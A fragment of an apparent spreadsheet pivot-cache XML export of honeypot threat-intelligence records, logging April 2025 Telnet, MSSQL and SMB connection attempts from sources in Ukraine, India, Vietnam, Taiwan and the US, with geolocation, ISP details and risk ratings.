    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:4e53"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2799"/>
    <x v="2799"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:12:17"/>
    <d v="2025-04-07T04:12:17"/>
    <d v="2025-04-07T04:12:17"/>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d1:642a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2800"/>
    <x v="2800"/>
    <s v="host-176-37-183-232.b025.la.net.ua&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:01:16"/>
    <d v="2025-02-25T15:12:24"/>
    <d v="2025-04-07T04:01:16"/>
    <n v="65"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;60914&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="39608"/>
    <s v="Lanet Network Ltd"/>
    <s v="Lanet Network"/>
    <s v="business"/>
    <s v="Lanet Network Ltd"/>
    <s v="2011-05-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b025:b7e8"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2801"/>
    <x v="2801"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T04:00:51"/>
    <d v="2024-04-11T21:39:00"/>
    <d v="2025-04-07T04:00:51"/>
    <n v="2303"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;14680&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4501"/>
    <s v="30.5234"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:2b0b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2802"/>
    <x v="2802"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T03:59:25"/>
    <d v="2023-12-04T11:22:00"/>
    <d v="2025-04-07T03:59:25"/>
    <n v="243"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;26849&amp;&amp;1433&amp;&amp;445&amp;&amp;50742"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HP"/>
    <s v="Haiphong"/>
    <s v="NA"/>
    <s v="Haiphong"/>
    <s v="1581298"/>
    <s v="NA"/>
    <s v="20.8648"/>
    <s v="106.683"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60303)}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (113.160.97.105,60852)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:6169"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2803"/>
    <x v="2803"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T03:27:20"/>
    <d v="2025-02-09T16:29:15"/>
    <d v="2025-04-07T03:27:20"/>
    <n v="133"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2011-05-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:72fb"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2804"/>
    <x v="2804"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T03:27:04"/>
    <d v="2025-04-07T03:27:04"/>
    <d v="2025-04-07T03:27:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:544e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2805"/>
    <x v="2805"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T03:13:05"/>
    <d v="2025-04-07T00:34:52"/>
    <d v="2025-04-07T03:13:05"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:a0f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2806"/>
    <x v="2806"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:29:32"/>
    <d v="2025-04-07T02:09:15"/>
    <d v="2025-04-07T02:29:32"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:7dcd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2807"/>
    <x v="2807"/>
    <s v="111-252-166-195.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-07T02:09:04"/>
    <d v="2025-04-05T13:38:34"/>
    <d v="2025-04-07T02:09:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2009-07-23"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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6ffc:a6c3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2808"/>
    <x v="2808"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:07:35"/>
    <d v="2024-11-28T12:14:11"/>
    <d v="2025-04-07T02:07:35"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:82a4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2809"/>
    <x v="2809"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:04:14"/>
    <d v="2023-12-02T01:14:00"/>
    <d v="2025-04-07T02:04:14"/>
    <n v="146"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;51951&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:5095"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2810"/>
    <x v="2810"/>
    <s v="47-201-99-28.fdr01.zphy.fl.ip.frontiernet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:03:55"/>
    <d v="2025-03-28T22:23:54"/>
    <d v="2025-04-07T02:03:55"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="FL"/>
    <s v="Florida"/>
    <s v="Hillsborough"/>
    <s v="Tampa"/>
    <s v="4174757"/>
    <s v="33606"/>
    <s v="27.9517"/>
    <s v="-82.4588"/>
    <s v="5650"/>
    <s v="Frontier Communications of America, Inc."/>
    <s v="Frontier Communications Corporation"/>
    <s v="business"/>
    <s v="Frontier Communications Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2fc9:631c"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2811"/>
    <x v="2811"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:03:50"/>
    <d v="2025-04-07T02:03:50"/>
    <d v="2025-04-07T02:03:50"/>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3:d0f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2812"/>
    <x v="2812"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:02:16"/>
    <d v="2025-01-15T16:41:51"/>
    <d v="2025-04-07T02:02:16"/>
    <n v="207"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eb9:4360"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2813"/>
    <x v="2813"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:02:04"/>
    <d v="2023-10-22T06:09:39"/>
    <d v="2025-04-07T02:02:04"/>
    <n v="61265"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;40919&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:ad2a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2814"/>
    <x v="2814"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:01:54"/>
    <d v="2023-09-16T15:55:37"/>
    <d v="2025-04-07T02:01:54"/>
    <n v="201"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;9134&amp;&amp;23&amp;&amp;51095&amp;&amp;52107&amp;&amp;36352&amp;&amp;NA&amp;&amp;19076"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:db09"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2815"/>
    <x v="2815"/>
    <s v="vmi2495273.contaboserver.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T02:00:59"/>
    <d v="2025-03-20T17:05:53"/>
    <d v="2025-04-07T02:00:59"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
